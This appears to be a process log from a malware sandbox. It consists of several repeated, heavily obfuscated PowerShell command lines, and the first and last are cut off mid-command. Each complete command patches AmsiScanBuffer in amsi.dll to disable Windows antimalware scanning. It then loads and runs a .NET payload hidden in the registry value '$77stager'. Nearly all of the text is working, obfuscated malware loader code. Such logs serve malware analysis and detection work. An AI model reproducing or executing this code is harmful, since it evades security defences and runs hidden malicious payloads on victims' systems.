$_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+'o'+'f'+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+'Un'+[Char](115)+'a'+'f'+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+''+'s'+'');$oaHdLgNfzrLTTk=$moEXHclNNEKhU.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VJpWYoyLMIjAyAdNEjt=TpbRNRSlYotL @([String])([IntPtr]);$tbLtIezpGYTlOVpYtEqGhR=TpbRNRSlYotL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GIYlxPbgrNz=$moEXHclNNEKhU.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+'eH'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$HcjyrHRrUuMuCk=$oaHdLgNfzrLTTk.Invoke($Null,@([Object]$GIYlxPbgrNz,[Object](''+[Char](76)+'o'+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$eVVqToKfwqnzTILEV=$oaHdLgNfzrLTTk.Invoke($Null,@([Object]$GIYlxPbgrNz,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+'a'+'l'+'P'+'rot'+[Char](101)+'c'+[Char](116)+'')));$oKamMhL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HcjyrHRrUuMuCk,$VJpWYoyLMIjAyAdNEjt).Invoke(''+'a'+''+[Char](109)+'si.'+'d'+'l'+[Char](108)+'');$XcvGHIxvhIVHLtkDb=$oaHdLgNfzrLTTk.Invoke($Null,@([Object]$oKamMhL,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+[Char](83)+''+'c'+'a'+'n'+''+'B'+'uffer')));$kKlhCQWCgR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eVVqToKfwqnzTILEV,$tbLtIezpGYTlOVpYtEqGhR).Invoke($XcvGHIxvhIVHLtkDb,[uint32]8,4,[ref]$kKlhCQWCgR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XcvGHIxvhIVHLtkDb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eVVqToKfwqnzTILEV,$tbLtIezpGYTlOVpYtEqGhR).Invoke($XcvGHIxvhIVHLtkDb,[uint32]8,0x20,[ref]$kKlhCQWCgR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+''+'7'+'s'+[Char](116)+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ygRrnSQLdSpg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YIQHmwBsUcUOxk,[Parameter(Position=1)][Type]$EEAkNZtuUH)$LIeYMKbEQpL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+'t'+'e'+'d'+'D'+[Char](101)+''+'l'+'eg'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+'e'+'',''+'C'+''+[Char](108)+'a'+'s'+'s,Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$LIeYMKbEQpL.DefineConstructor(''+[Char](82)+''+[Char](84)+'Spe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+'a'+'m'+''+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+','+''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$YIQHmwBsUcUOxk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');$LIeYMKbEQpL.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](72)+''+'i'+'d'+[Char](101)+'ByS'+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+''+','+''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$EEAkNZtuUH,$YIQHmwBsUcUOxk).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $LIeYMKbEQpL.CreateType();}$nfZBKtlAOiPvB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+'e'+'m'+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+''+'W'+'in3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+''+[Char](97)+'ti'+'v'+''+'e'+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$OZAfuCyUeXHQTr=$nfZBKtlAOiPvB.GetMethod('G'+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+'o'+'c'+[Char](65)+'d'+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rFPjpXjUWhIbcMJFklH=ygRrnSQLdSpg @([String])([IntPtr]);$OroFjFzLlaoQZjoKhQnJAv=ygRrnSQLdSpg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KyzBRbaQdSi=$nfZBKtlAOiPvB.GetMethod(''+[Char](71)+'et'+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'a'+'n'+'d'+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'ne'+[Char](108)+''+[Char](51)+''+[Char](50)+'.dl'+'l'+'')));$CzXxaratrBgVRs=$OZAfuCyUeXHQTr.Invoke($Null,@([Object]$KyzBRbaQdSi,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+''+[Char](105)+''+'b'+'r'+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$UsXYrsfDRFVWLXrzn=$OZAfuCyUeXHQTr.Invoke($Null,@([Object]$KyzBRbaQdSi,[Object](''+[Char](86)+'ir'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$oZgBjrV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CzXxaratrBgVRs,$rFPjpXjUWhIbcMJFklH).Invoke('a'+'m'+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$eRrVnWMSrRZJcEmCE=$OZAfuCyUeXHQTr.Invoke($Null,@([Object]$oZgBjrV,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$yrwElwLGGx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsXYrsfDRFVWLXrzn,$OroFjFzLlaoQZjoKhQnJAv).Invoke($eRrVnWMSrRZJcEmCE,[uint32]8,4,[ref]$yrwElwLGGx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eRrVnWMSrRZJcEmCE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsXYrsfDRFVWLXrzn,$OroFjFzLlaoQZjoKhQnJAv).Invoke($eRrVnWMSrRZJcEmCE,[uint32]8,0x20,[ref]$yrwElwLGGx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:obDIBtBFzrru{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DFAjBYLVRNtiSd,[Parameter(Position=1)][Type]$OjLWLtuZoN)$XYZlAefOthh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'od'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+'ubl'+'i'+'c'+[Char](44)+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'siC'+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+'o'+'C'+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$XYZlAefOthh.DefineConstructor('R'+[Char](84)+''+[Char](83)+'pe'+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$DFAjBYLVRNtiSd).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$XYZlAefOthh.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+'i'+[Char](99)+''+','+''+[Char](72)+''+'i'+'de'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+'Vi'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+'l'+'',$OjLWLtuZoN,$DFAjBYLVRNtiSd).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'nage'+[Char](100)+'');Write-Output $XYZlAefOthh.CreateType();}$dXVcFgbzSznmm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+''+'r'+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+'Na'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+'h'+'o'+''+'d'+'s');$XZVXKDOISvQcQe=$dXVcFgbzSznmm.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+'t'+'a'+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TvzTQxHcYlevLjarTaV=obDIBtBFzrru @([String])([IntPtr]);$OpshjPIaUNwzLUfygvnaoq=obDIBtBFzrru @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tOVgAyxoEPJ=$dXVcFgbzSznmm.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$sOeMiFoDvGIGqO=$XZVXKDOISvQcQe.Invoke($Null,@([Object]$tOVgAyxoEPJ,[Object]('L'+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$ymCWtcaYAWUizKtsY=$XZVXKDOISvQcQe.Invoke($Null,@([Object]$tOVgAyxoEPJ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+'ct')));$xrbcuVP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sOeMiFoDvGIGqO,$TvzTQxHcYlevLjarTaV).Invoke('am'+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$MsbUrNsUuZdehKamn=$XZVXKDOISvQcQe.Invoke($Null,@([Object]$xrbcuVP,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+'c'+'an'+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$ULktMWJWZe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ymCWtcaYAWUizKtsY,$OpshjPIaUNwzLUfygvnaoq).Invoke($MsbUrNsUuZdehKamn,[uint32]8,4,[ref]$ULktMWJWZe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MsbUrNsUuZdehKamn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ymCWtcaYAWUizKtsY,$OpshjPIaUNwzLUfygvnaoq).Invoke($MsbUrNsUuZdehKamn,[uint32]8,0x20,[ref]$ULktMWJWZe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+'W'+''+[Char](65)+'RE').GetValue(''+'$'+''+[Char](55)+'7s'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QDrOoLIVtkEC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EyraeZMIdCimoF,[Parameter(Position=1)][Type]$LDFGIsiPTV)$BPBQCISAyIs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+'l'+''+'e'+'g'+'a'+''+'t'+''+'e'+''+'T'+''+[Char](121)+'p'+[Char](101)+'','C'+'l'+''+[Char](97)+''+[Char](115)+'s'+','+''+'P'+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$BPBQCISAyIs.DefineConstructor('R'+'T'+''+'S'+''+'p'+''+[Char](101)+''+[Char](99)+'ia'+'l'+''+[Char](78)+'am'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EyraeZMIdCimoF).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$BPBQCISAyIs.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$LDFGIsiPTV,$EyraeZMIdCimoF).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'time'+','+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $BPBQCISAyIs.CreateType();}$gWbBbtZQwLWTQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+[Char](105)+'c'+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n3'+'2'+'.U'+[Char](110)+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+'e'+'t'+[Char](104)+''+[Char](111)+'ds');$nsASZkkjLAxCUA=$gWbBbtZQwLWTQ.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'oc'+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+'e'+'ss',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+',S'+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MMuoTCVCXPILvCZTNsG=QDrOoLIVtkEC @([String])([IntPtr]);$nFeeBuyVAfCllgmGEunZjX=QDrOoLIVtkEC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qftIUnKuxiK=$gWbBbtZQwLWTQ.GetMethod(''+'G'+''+'e'+''+[Char](116)+'Mod'+'u'+''+[Char](108)+''+'e'+''+'H'+'a'+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$xsqqHcvpzKfjSO=$nsASZkkjLAxCUA.Invoke($Null,@([Object]$qftIUnKuxiK,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$nolhkjDnnXVyOxLBf=$nsASZkkjLAxCUA.Invoke($Null,@([Object]$qftIUnKuxiK,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$uMbKbKl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xsqqHcvpzKfjSO,$MMuoTCVCXPILvCZTNsG).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$ujxqdWIyqQjEWcPZy=$nsASZkkjLAxCUA.Invoke($Null,@([Object]$uMbKbKl,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+'can'+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$HjilwQcmSm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nolhkjDnnXVyOxLBf,$nFeeBuyVAfCllgmGEunZjX).Invoke($ujxqdWIyqQjEWcPZy,[uint32]8,4,[ref]$HjilwQcmSm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ujxqdWIyqQjEWcPZy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nolhkjDnnXVyOxLBf,$nFeeBuyVAfCllgmGEunZjX).Invoke($ujxqdWIyqQjEWcPZy,[uint32]8,0x20,[ref]$HjilwQcmSm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+'t'+'ag'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JKuQgPPDnYRM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XGdvPdwdOGVqRF,[Parameter(Position=1)][Type]$xxZxrKoisa)$MbqnVLEZTsp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+'e'+'m'+''+[Char](111)+''+[Char](114)+''+'y'+'M'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'ga'+'t'+''+'e'+'Type','C'+[Char](108)+''+[Char](97)+'ss,'+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+'l'+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$MbqnVLEZTsp.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+'e'+'ci'+[Char](97)+''+'l'+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XGdvPdwdOGVqRF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$MbqnVLEZTsp.DefineMethod('I'+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$xxZxrKoisa,$XGdvPdwdOGVqRF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+',Ma'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $MbqnVLEZTsp.CreateType();}$tnJAaajptSuwC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 